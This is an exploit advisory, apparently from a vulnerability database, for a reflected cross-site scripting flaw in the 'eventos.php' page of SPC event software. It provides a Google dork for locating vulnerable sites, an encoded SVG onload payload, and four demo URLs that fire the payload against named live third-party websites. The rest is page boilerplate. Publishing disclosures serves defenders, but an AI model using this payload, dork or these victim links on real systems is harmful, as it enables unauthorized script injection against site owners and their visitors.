SPC - Cross Site Scripting

2016.02.03
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

###################### # Exploit Title : SPC - Cross Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : http://spc.com.es/ # Google Dork : "SPC" inurl:eventos.php?nuevo_ano= # Date: 2016/01/30 # Version: V2016 ###################### # PoC: # nuevo_mes=[XSS] # Payload = '>Persian<svg%2Fonload%3Dconfirm(%2FMobhaM%2F)>Hack Team # Demo: #http://www.delf-dalf.es/eventos.php?primero=5&proximos=1&nuevo_mes=02%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team #http://www.mundocompresor.com/frontend/mc/eventos.php?primero=0&proximos=1&nuevo_mes=10%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team #http://www.elpublicista.es/frontend/elpublicista/eventos.php?tipoeve=3&proximos=1&nuevo_mes=01%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team #http://www.indisa.es/frontend/indisa/eventos.php?proximos=1&nuevo_mes=5%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team # ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) # Homepage : persian-team.ir ######################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top